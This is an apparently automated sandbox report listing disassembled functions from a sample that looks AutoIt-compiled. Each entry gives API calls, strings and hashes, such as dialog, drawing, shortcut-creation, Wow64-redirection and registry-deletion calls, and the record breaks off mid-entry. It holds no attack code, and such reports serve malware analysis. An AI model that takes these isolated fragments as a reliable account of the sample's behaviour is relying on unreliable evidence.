Opcode ID: b5a875a3dd02940542fac8f34ecb72e8e9870219024c47f5d5cb882328ab4e66
Instruction ID: f019b97cda8fd4eb212999b5486422a4b8dd56b789eba47839d5468687f55e92
Opcode Fuzzy Hash: b5a875a3dd02940542fac8f34ecb72e8e9870219024c47f5d5cb882328ab4e66
Instruction Fuzzy Hash: 59F0A470241204BFDB115FE5DC8CE673BACEF4A759B100035F509E2150CB60E804DA61

Function 00E7C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00E7C6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 00E7C6D1
MessageBeep.USER32(00000000), ref: 00E7C6E9
KillTimer.USER32(?,0000040A), ref: 00E7C705
EndDialog.USER32(?,00000001), ref: 00E7C71F

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 1a74a8a6af4cee91d59fecd053b8d90988f1a9c9cab91487ada62fdbc2ef0793
Instruction ID: 39838195123e2642219ff4e7b27c39d10161b6738ee8c7c4a8861aebcadf95d7
Opcode Fuzzy Hash: 1a74a8a6af4cee91d59fecd053b8d90988f1a9c9cab91487ada62fdbc2ef0793
Instruction Fuzzy Hash: 9F018F70400704ABEB245B61EC8EB9677BCBB09B05F00566EF586B10E1DBE0A9588A80

Function 00E213B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00E213BF
StrokeAndFillPath.GDI32(?,?,00E5BAD8,00000000,?), ref: 00E213DB
SelectObject.GDI32(?,00000000), ref: 00E213EE
DeleteObject.GDI32 ref: 00E21401
StrokePath.GDI32(?), ref: 00E2141C

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 61f4e45bc197d9806f371e31922e94ec10ea4da193ca4fb32f91f56e3b47c6cb
Instruction ID: 404d7ac95cc354ad75b0a3f342bd129eab939d52c66445078666f4a52cb34be5
Opcode Fuzzy Hash: 61f4e45bc197d9806f371e31922e94ec10ea4da193ca4fb32f91f56e3b47c6cb
Instruction Fuzzy Hash: 95F0C93000424CEFDB195F67FC8C7583FA5AB25366F089264F469A90F1C7315A99DF54

Function 00E8C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00E8C69D
CoCreateInstance.OLE32(00EB2D6C,00000000,00000001,00EB2BDC,?), ref: 00E8C6B5

Part of subcall function 00E27F41: _memmove.LIBCMT ref: 00E27F82

CoUninitialize.OLE32 ref: 00E8C922

Strings

.lnk, xrefs: 00E8C631, 00E8C659, 00E8C663

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: beebbe11dd125126660bcee18462411e586d0a5614104940bfee34ff9d5c82f1
Instruction ID: a9130e7df633d56df54d64e156ebf98517e88ea743164011871c60f8e1c564d1
Opcode Fuzzy Hash: beebbe11dd125126660bcee18462411e586d0a5614104940bfee34ff9d5c82f1
Instruction Fuzzy Hash: DDA16E71108315AFD700EF64D882EABB7E8FF94304F00695DF19AA7192DB70EA49CB52

Function 00E32E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00E40FF6: std::exception::exception.LIBCMT ref: 00E4102C
Part of subcall function 00E40FF6: __CxxThrowException@8.LIBCMT ref: 00E41041

Part of subcall function 00E27F41: _memmove.LIBCMT ref: 00E27F82

Part of subcall function 00E27BB1: _memmove.LIBCMT ref: 00E27C0B

__swprintf.LIBCMT ref: 00E3302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E32EC6

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: ffa30ab51b82a68a133d521a1520afae0bb157c42d34fd72d19b8088319c0615
Instruction ID: cef51b915252b6c02c85f75f237262b8da365ee228d03179b5b320d77580fc26
Opcode Fuzzy Hash: ffa30ab51b82a68a133d521a1520afae0bb157c42d34fd72d19b8088319c0615
Instruction Fuzzy Hash: 72917D712183119FC718EF24E889C6EBBE4EF85754F00691DF496AB2A1DA30EE44CB52

Function 00E8BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E248AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E248A1,?,?,00E237C0,?), ref: 00E248CE

CoInitialize.OLE32(00000000), ref: 00E8BC26
CoCreateInstance.OLE32(00EB2D6C,00000000,00000001,00EB2BDC,?), ref: 00E8BC3F
CoUninitialize.OLE32 ref: 00E8BC5C

Part of subcall function 00E29997: __itow.LIBCMT ref: 00E299C2
Part of subcall function 00E29997: __swprintf.LIBCMT ref: 00E29A0C

Strings

.lnk, xrefs: 00E8BC08, 00E8BC16

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: b634218d835184f7e2863a9a2ce0e6a9b03716f051deae2e51b3458ae756fe3d
Instruction ID: 1865270116a823c68d27802ba74a0e3c6c91372fe9b6139b27c6ad29efc365cc
Opcode Fuzzy Hash: b634218d835184f7e2863a9a2ce0e6a9b03716f051deae2e51b3458ae756fe3d
Instruction Fuzzy Hash: 5AA177756043119FCB14EF14C484D6ABBE5FF89314F049998F899AB3A2CB31ED45CB91

Function 00E7B7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00E7B981

Strings

%, xrefs: 00E7BA24
Container, xrefs: 00E7B8FE
AutoIt3GUI, xrefs: 00E7B8F9

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%
API String ID: 3565006973-1286912533
Opcode ID: ada558b9b4cbf7d27427da3ba7e07c711f94db776b940258d425fcec32ec5ffc
Instruction ID: d7827aa1722a8e2ba6c52304fe3fc2ab6b1737f5ad6ff98ec59565d30b3b974e
Opcode Fuzzy Hash: ada558b9b4cbf7d27427da3ba7e07c711f94db776b940258d425fcec32ec5ffc
Instruction Fuzzy Hash: A8915A706002019FDB24DF28C885BAABBF9FF48714F14956EF94AEB291DB70E841CB50

Function 00E4524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00E452DD

Part of subcall function 00E50340: __87except.LIBCMT ref: 00E5037B

Strings

pow, xrefs: 00E452B5, 00E452D2

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 8c199042f76f04f26ae43e566845dd0bf3c0f9560a66e62ed1469b68e6226169
Instruction ID: 4d498bb7abf05e874db9342d16040a9a140b9a8bdc0cd385643ce7376a89cc0d
Opcode Fuzzy Hash: 8c199042f76f04f26ae43e566845dd0bf3c0f9560a66e62ed1469b68e6226169
Instruction Fuzzy Hash: 27517C22E0D6018BC711BB14E9413BE6BD09B40755F20BD59F8E5B61EBEF748CCC9A45

Function 00E4023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00E40280
+, xrefs: 00E40277

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 48aa4795e46b6bce0028bbcf795a3bc7b5cfc3d742bc611a4880acdf9e4514c8
Instruction ID: 69ef4af324d96aae4dba8bca87366a3b9dd1dbdd897233a27ae664099d4feedc
Opcode Fuzzy Hash: 48aa4795e46b6bce0028bbcf795a3bc7b5cfc3d742bc611a4880acdf9e4514c8
Instruction Fuzzy Hash: 55515776504246CFDF25DF28D488AFA7BA4EF1A314F149065FE95BB2A0C7709C42C760

Function 00E33297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E333D7
_memmove.LIBCMT ref: 00E33470
_free.LIBCMT ref: 00E33496
_memmove.LIBCMT ref: 00E33549

Strings

Oa, xrefs: 00E33482

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memmove$_free
String ID: Oa
API String ID: 2620147621-3945284152
Opcode ID: 4fca455e662985168a8464634645c263c16f63ddbe2711df6f23500ac5911626
Instruction ID: 1722511a9aab6144a75d030a414eb5d7e0f376928a303bba2a552571d2f44102
Opcode Fuzzy Hash: 4fca455e662985168a8464634645c263c16f63ddbe2711df6f23500ac5911626
Instruction Fuzzy Hash: 73517BB1A083419FDB24CF28D455B2BBBE1FF85318F04592DE989A7361DB31E941CB92

Function 00E362F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E363A8
_memmove.LIBCMT ref: 00E36446
_memset.LIBCMT ref: 00E3646A

Strings

ERCP, xrefs: 00E36313

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: c879a02c3ecd510e4b304a77b1d3930a712c3de3e6f4b75fdf43dea84a563646
Instruction ID: a6194aea9e5b14dfb33ffae096a88f7711b82cb7b734973af45518b479e3ce78
Opcode Fuzzy Hash: c879a02c3ecd510e4b304a77b1d3930a712c3de3e6f4b75fdf43dea84a563646
Instruction Fuzzy Hash: DA51C271900309EBCB24CF65C8857AABBF4FF44318F20E56EE55AEB241E7719985CB40

Function 00EA7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EA76D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EA76E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00EA7708

Strings

SysMonthCal32, xrefs: 00EA769B

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: eaab77b230eae419e95abff747bbd4003d7bbad1d88fdb051e99e468ea79ec74
Instruction ID: 78f17c02cc60e88c1e7b90bad9773af58aac5cc9bc921f0c512f52bb09426a51
Opcode Fuzzy Hash: eaab77b230eae419e95abff747bbd4003d7bbad1d88fdb051e99e468ea79ec74
Instruction Fuzzy Hash: F721BF32600218ABDF15CFA4CC42FEA3BA9EF8D724F111215FE557B1D0DAB1B8548BA0

Function 00EA6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EA6FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EA6FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EA6FDF

Strings

Listbox, xrefs: 00EA6F77

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 1831ccff6378cd966e23103af9ce6112df8b2cf3daa0d77b03e111c7502d751d
Instruction ID: 9b5cd0b0b6220f4f71fa367e4a74847639e39a87064b320517a45589d0464587
Opcode Fuzzy Hash: 1831ccff6378cd966e23103af9ce6112df8b2cf3daa0d77b03e111c7502d751d
Instruction Fuzzy Hash: D6219236710118BFDF118F54DC85EAB3BAAEF8F768F059125F914AB190C671AC518BA0

Function 00EA797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EA79E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EA79F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EA7A03

Strings

msctls_trackbar32, xrefs: 00EA79B8

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 5d887c7ab27601830494e7439517007fb36fee38a4ca988e95a13b690203309a
Instruction ID: 6b5d32901b50066f02f8415b61283bf3e007f9f194ffbfe876f2547a7bbd8704
Opcode Fuzzy Hash: 5d887c7ab27601830494e7439517007fb36fee38a4ca988e95a13b690203309a
Instruction Fuzzy Hash: EC11C132244208BBEF149F65CC05FEB77A9EF8E768F021529FA41BA091D271A811CB60

Function 00E24C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E24C2E), ref: 00E24CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E24CB5

Strings

GetNativeSystemInfo, xrefs: 00E24CAF
kernel32.dll, xrefs: 00E24C9E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 2daac5397a14f5f74bf66e75b8477f55b55eecdf987808d2ec0cf3fab7659238
Instruction ID: 5baed8b7932693d63c8bcc4d334ab90ebb738659c964ed7b80b33731a1de0bea
Opcode Fuzzy Hash: 2daac5397a14f5f74bf66e75b8477f55b55eecdf987808d2ec0cf3fab7659238
Instruction Fuzzy Hash: 94D0C2B0501323CFD7205FB5D909602B2E4AF0A740B219839D882F6190D670E480C620

Function 00E24D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E24CE1,?), ref: 00E24DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E24DB4

Strings

kernel32.dll, xrefs: 00E24D9D
Wow64RevertWow64FsRedirection, xrefs: 00E24DAE

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: f8c7633a147577afd1465214fd80eb50c047a8c091120e7a9a992676dd8cf2ec
Instruction ID: 46728505681fd48519f427c5b38a9403bc2e907a4081c5d9cfa63f00091e33a8
Opcode Fuzzy Hash: f8c7633a147577afd1465214fd80eb50c047a8c091120e7a9a992676dd8cf2ec
Instruction Fuzzy Hash: BAD01771550723CFD7209FB2E848A8676E4AF1A359B11D83AD8C6F6290E770E880CA60

Function 00E24D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E24D2E,?,00E24F4F,?,00EE62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E24D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E24D81

Strings

kernel32.dll, xrefs: 00E24D6A
Wow64DisableWow64FsRedirection, xrefs: 00E24D7B

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 2b495a3b11b4e8f1d58eb8f3b70dd3cbba5ec2f154d6220ec813a1e63fa4f21c
Instruction ID: af1d27aec20445ca726e0dd6254f0e22ae2e5b114fdffb540d63e80571907e59
Opcode Fuzzy Hash: 2b495a3b11b4e8f1d58eb8f3b70dd3cbba5ec2f154d6220ec813a1e63fa4f21c
Instruction Fuzzy Hash: 5DD01770510723CFD7209FB2E84865676E8AF2A356B11D83AD4C6F6290E670E881CA60

Function 00EA1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00EA12C1), ref: 00EA1080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EA1092

Strings

advapi32.dll, xrefs: 00EA107B
RegDeleteKeyExW, xrefs: 00EA108C

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 3c6af25aeeb55f4336ae70b9288095e525908bf2ac197b7bf3d12e81ab37ea30
Instruction ID: 290f1f2cda899481a0900b22f983c5758fa234e482df4a6f4ed8d72138e046ca
Opcode Fuzzy Hash: 3c6af25aeeb55f4336ae70b9288095e525908bf2ac197b7bf3d12e81ab37ea30
Instruction Fuzzy Hash: FBD01231510712CFD7205F75D95851A76E4EF1A355F119C7EE4C5FA260E770E4C0C650

Function 00E993F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

